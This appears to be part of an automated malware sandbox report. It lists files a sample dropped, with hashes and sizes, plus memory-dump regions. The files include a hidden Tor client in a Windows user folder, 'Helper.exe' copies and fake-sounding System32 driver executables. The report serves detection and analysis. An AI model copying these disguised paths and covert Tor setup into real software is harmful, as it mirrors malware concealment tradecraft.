SHA1
bbd7fcdc38f3a29c372bbcf41e2a590ff9eac3d1

SHA256
330a7b523ad57ad797fc522f02cd1de4df499830c8eb1ec792fe5d72c3fbb6ec

SHA512
4c5436ce1bedc1037dfb87b26c93771e883db2280f5437c37d683dc0a3e1373191a1043695df73bcd1c149c91d2842e0936a5715549cce0b4aed887dbf687376

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
7.8MB

MD5
20e2fd337e5e2e71f684acb3345378d0

SHA1
7239b42c95c91886152e7ace163593627d933f2a

SHA256
fdf660907e1a5523bfd54f2b58ce1efe86242247e90b33692471614b08ddc255

SHA512
439de3b15ccd7559bfbd9a58e2c2f6e64b75bb21998e41121ff43b879ec35a915e70631b4712b6c528b7ff7de55d178e21ee93b2d5cc518207a7fcfb7df34812

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1-x64.dll

Filesize
3.4MB

MD5
791a48e7cf84ec1532d20127556f6300

SHA1
774f71e595cfc7e24dc941839566bc9edd9156c5

SHA256
af682ad107cf0e9d9f11adeaf88f817610988b56577c4020897debc0f98e26ff

SHA512
ecbb4a07bb68fec5258be0adc91b89d179b5668bbab3be3bd72d5339f8bf3b32a1860b38693a304029fe989bd92adb020cf755f673b1e59966dfc75e4f958cfa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll

Filesize
974KB

MD5
be51ba4bea2d731dacf974c43941e457

SHA1
51fc479fd8ee9a2b72e6aa020ce5bb1c7a28f621

SHA256
98d06628e3d9c8097d239722e83ad78eb0b41b1e2f54d50a500da6d9292ff747

SHA512
6184accd206aa466278c2f4b514fd5c85820d47cf3a148904e93927621ac386890e657f09547b694c32ef23c355ae738b7c7d039fcd6c791529198c7b0b6bd1e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll

Filesize
313KB

MD5
97d89dec5f6a236b6832a5f3f43ab625

SHA1
18f2696a3bf4d19cac3b677d58ff5e51bf54b9e8

SHA256
c6dca12e0e896df5f9b2db7a502a50d80d4fb014d7ec2f2ceb897b1a81f46ead

SHA512
7e82d1e37dc822a67e08bd1d624d5492f5813a33ec64f13d22caef9db35ebb9bb9913582289ebdecad00e6b6148d750ae0b4437364ef056d732734255498be54

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll

Filesize
608KB

MD5
624304f2ba253b33c265ff2738a10eb9

SHA1
5a337e49dd07f0b6f7fc6341755dc9a298e8b220

SHA256
27b857131977106c4a71ce626225d52a3d6e2932cb6243cb83e47b8d592d0d4f

SHA512
163820961a64b3fda33969cbb320aa743edc7a6bacebe033054c942e7a1d063f096290a59fad1569c607666429e2f3133fcfe31ef37649f9da71b453ef775e5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
3.0MB

MD5
4ebd2e2c7b6b18e92dc9205f8dc5cdec

SHA1
a6e3c8571311b632239d265fbbf6409f0bed4797

SHA256
d82f84ed6f8437a4b3d014a82a63cd7e3298db4a524089d17a50c52877f4f913

SHA512
df29ee0d83a09fe1eae109af39e0ca942ddf330d96f8f7dc63361f02e2865298e2a5c0f6291d44c49a1ad4c05ac88c55b8920116c7c29a884a730a70bdde9524

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
8KB

MD5
b991efaccca17c4b9512015d1398eab3

SHA1
a869c5be673ab2de958ca3dccd435f9dfe8b37b9

SHA256
1841f0059208ee2af5e66b01529bbdce3a1d46d8890e6ebfdb0f9381ad871da9

SHA512
e2d64f02fdf08113b65f533e40589d485564eec38298f2e31baea01a90e60b0ac306b963c7750aea294d7c5341c627cfe3de51d7b6416cb5d9634795cd39e291

Download Submit
C:\Windows\System32\SetupTCPIP6Driver.exe

Filesize
8KB

MD5
488bfa6d9fd5c874585daa3f960e6804

SHA1
aa8ca3927c318716e14210fc0a3ed70ea483eb23

SHA256
a84bfef2ce112366349e3ce8c70e120ec63731535696b405a458e5ccfcdf7f48

SHA512
952db3ec6548421b8c013c1482545e005c7526f0c4f432b12bde8460a13c88d0f1022cfe3008af88bb043d9fdede9e341bcc406d7d2fc8370249da75642a07a1

Download Submit
C:\Windows\System32\SetupTcpipDriver.exe

Filesize
28KB

MD5
2fbe46325e890bee1e21aba30c9345be

SHA1
2c860d226f6b8f59caa058e39d06d6ae24007227

SHA256
cfbd108945d203a6a5ced2dc4eee0084ba66972c1361c05b6b7065276f15eb4b

SHA512
133e2c1a9bad1b7a9c7e519c6132a4494af5a0233c47ee3eecae263f72bce8345356f032bbbcdefc934776020b210327f18a52b72138006808975f8bad2ebc34

Download Submit
\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt

Filesize
679KB

MD5
0bfa50a6813c56bda593635addc6ae8e

SHA1
92d90af0a3819c0efb002b66633e46b99bf75bbc

SHA256
7938ed6a8a2f31451639fcf5b704d1b8217bf183a01014742daf1873e9ab5ddb

SHA512
15f84cea8f843825beb0d3bc83bf68b1d861ca24e7242aada4f4e626c2b04268926a3aeb6f9f377bf49b66ad7fbd03f99798574387669ab889b896ae2ef51821

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
384KB

MD5
d22a86d5325f209051bdb2474cc84c16

SHA1
929c1cf605a4efbd659d10effe26b226a61de819

SHA256
1ceed855de355d65ab0b87f2dd0732625b802123d3242f4353e5604f7824ce1e

SHA512
5866d02da972d7a5534105d6c2f0c92f93343f9e92221ae43e71f6b50c0936115f35688611046aff1ac77309c1015048aba8af14e88cbff1d8acd893db5ffdf0

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
887KB

MD5
386322a9beea876e497432f07b1d5b63

SHA1
cfbae4d082d686c59d4c458f85623ee2447d5f29

SHA256
746c5918fe6bb562b93ca6d3d13d18578ff2eada306b546ccf659397fdac2bc9

SHA512
4efcd68330d6b8779d46f3a78a94b565d87dd2a1a428d7291ca52019978e4dca7da77220eaf170d34848a23c423816a5edd20fbf1856fcceacffd3c92adf9d5f

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
8.0MB

MD5
26b43fe7715247d1826e464620ca3b44

SHA1
67b6301ef4afe237d84a661fbf42e1059a2fd745

SHA256
c2d37ed676d2d03a8a71002e1faa97acb79032eed6d3475d7069ceaccead7d1f

SHA512
529e9ae4004b89b062505d8c5dafaf49a6e4b5369aeb20c6143e2db6f79fbda05b2a654128012966bd4618b4e9825877dbd123b4d64268ba777e2caed8a674a1

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
128KB

MD5
979ccaa40a9f26006f68a9a828a7cae7

SHA1
4326b06428fa7aa9cf14ab01d068c056299f64d8

SHA256
fd53a82cb5218a446d1747d2a8768bd52edc699461fc4d098bb1883916951269

SHA512
4c39e353fdef7fc43acdd284e95b6cd2ab3d3a95a9ea2c10d14760a467b1b914ae2ec1840e78a1c54b5dcf5e4c7a5745eb05734b6914d1d22e55628bb0b692e2

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
136KB

MD5
21c206e2c5f330779881bda8b3ac12fb

SHA1
1f47fd7f59e058eebe7aed38e3cd4ef4b7934e45

SHA256
13c034e67c5d159be36cbac514e69e7960cda8c978f1189a5ac432bbd3aa4f6f

SHA512
bac821730089957d1708caea04b9d5d340139d68a7a5fc3587d8dece2f12d5a5cd73ece9e3aca96e57db405d7899b25cb8456614728eb668265644feaffe40c2

Download Submit
memory/988-184-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/988-199-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/988-177-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/988-178-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/988-173-0x0000000002090000-0x0000000002098000-memory.dmp

Filesize
32KB

Download
memory/988-176-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/988-174-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/988-171-0x000000001B470000-0x000000001B752000-memory.dmp

Filesize
2.9MB

Download
memory/988-189-0x0000000002AC0000-0x0000000002B40000-memory.dmp

Filesize
512KB

Download
memory/1056-115-0x0000000002A10000-0x0000000002A90000-memory.dmp

Filesize
512KB

Download
memory/1056-116-0x000007FEEE8C0000-0x000007FEEF25D000-memory.dmp

Filesize
9.6MB

Download
memory/1056-108-0x000000001B3B0000-0x000000001B692000-memory.dmp

Filesize
2.9MB

Download
memory/1056-112-0x000007FEEE8C0000-0x000007FEEF25D000-memory.dmp

Filesize
9.6MB

Download
memory/1056-125-0x000007FEEE8C0000-0x000007FEEF25D000-memory.dmp

Filesize
9.6MB

Download
memory/1056-122-0x0000000002A10000-0x0000000002A90000-memory.dmp

Filesize
512KB

Download
memory/1056-118-0x0000000002A10000-0x0000000002A90000-memory.dmp

Filesize
512KB

Download
memory/1056-114-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/1056-117-0x0000000002A10000-0x0000000002A90000-memory.dmp

Filesize
512KB

Download
memory/1412-10-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/1412-9-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/1412-14-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/1412-15-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/1412-8-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/1412-13-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/1412-12-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/1412-11-0x00000000027B0000-0x0000000002830000-memory.dmp

Filesize
512KB

Download
memory/1412-7-0x000000001B390000-0x000000001B672000-memory.dmp

Filesize
2.9MB

Download
memory/1664-183-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/1664-186-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/1664-181-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1664-182-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/1904-93-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/1904-308-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/1904-1114-0x000000001BD10000-0x000000001BD90000-memory.dmp

Filesize
512KB

Download
memory/1904-92-0x0000000000150000-0x000000000016C000-memory.dmp

Filesize
112KB

Download
memory/1984-505-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/1984-222-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/1984-220-0x0000000000A90000-0x0000000000A9C000-memory.dmp

Filesize
48KB

Download
memory/2200-59-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/2200-54-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/2200-55-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/2200-58-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/2200-66-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/2200-56-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2200-67-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/2200-57-0x000007FEEF6B0000-0x000007FEF004D000-memory.dmp

Filesize
9.6MB

Download
memory/2224-1126-0x0000000000560000-0x0000000000683000-memory.dmp

Filesize
1.1MB

Download
memory/2224-1130-0x0000000000560000-0x0000000000683000-memory.dmp

Filesize
1.1MB

Download
memory/2224-1128-0x000007FFFFFDC000-0x000007FFFFFDD000-memory.dmp

Filesize
4KB

Download
memory/2224-1134-0x0000000000560000-0x0000000000683000-memory.dmp

Filesize
1.1MB

Download
memory/2228-38-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/2228-30-0x000000001B160000-0x000000001B442000-memory.dmp

Filesize
2.9MB

Download
memory/2228-35-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/2228-34-0x000007FEEE8C0000-0x000007FEEF25D000-memory.dmp

Filesize
9.6MB

Download
memory/2228-33-0x00000000025A0000-0x00000000025A8000-memory.dmp

Filesize
32KB

Download
memory/2228-32-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/2228-31-0x000007FEEE8C0000-0x000007FEEF25D000-memory.dmp

Filesize
9.6MB

Download
memory/2228-39-0x000007FEEE8C0000-0x000007FEEF25D000-memory.dmp

Filesize
9.6MB

Download
memory/2228-37-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/2300-310-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/2300-307-0x0000000000030000-0x000000000003C000-memory.dmp

Filesize
48KB

Download
memory/2300-1115-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/2472-40-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2972-1-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/2972-53-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download
memory/2972-36-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/2972-0-0x000000013F9B0000-0x000000014095E000-memory.dmp

Filesize
15.7MB

Download
memory/2972-2-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download
memory/2972-227-0x000007FEF6220000-0x000007FEF6C0C000-memory.dmp

Filesize
9.9MB

Download
memory/3480-1184-0x0000000073F00000-0x0000000073F54000-memory.dmp

Filesize
336KB

Download
memory/3480-1187-0x0000000071B40000-0x0000000071C13000-memory.dmp

Filesize
844KB

Download
memory/3480-1182-0x0000000001150000-0x00000000015B1000-memory.dmp

Filesize
4.4MB

Download
memory/3480-1183-0x0000000071C20000-0x0000000071D03000-memory.dmp

Filesize
908KB

Download
memory/3480-1185-0x0000000072890000-0x0000000072928000-memory.dmp

Filesize
608KB

Download
memory/3480-1636-0x0000000001150000-0x00000000015B1000-memory.dmp

Filesize
4.4MB

Download
memory/3480-1643-0x0000000001150000-0x00000000015B1000-memory.dmp

Filesize
4.4MB

Download
memory/3480-1186-0x0000000071600000-0x00000000718ED000-memory.dmp

Filesize
2.9MB

Download
memory/3480-2202-0x0000000001150000-0x00000000015B1000-memory.dmp

Filesize
4.4MB

Download
memory/3480-1188-0x0000000075640000-0x0000000075663000-memory.dmp

Filesize
140KB

Download
memory/3480-4477-0x0000000001150000-0x00000000015B1000-memory.dmp

Filesize
4.4MB

Download
memory/4664-4468-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/4664-4470-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/4664-4466-0x000007FFFFFD9000-0x000007FFFFFDA000-memory.dmp

Filesize
4KB

Download
memory/5004-4486-0x0000000000190000-0x0000000000CA1000-memory.dmp

Filesize
11.1MB

Download
memory/5004-4487-0x000007FFFFFDE000-0x000007FFFFFDF000-memory.dmp

Filesize
4KB

Download
memory/5004-4489-0x0000000000190000-0x0000000000CA1000-memory.dmp

Filesize
11.1MB

Download
memory/5004-4491-0x0000000000190000-0x0000000000CA1000-memory.dmp

Filesize
11.1MB

Download
memory/5004-4494-0x0000000000DB0000-0x0000000000DD0000-memory.dmp

Filesize
128KB

Download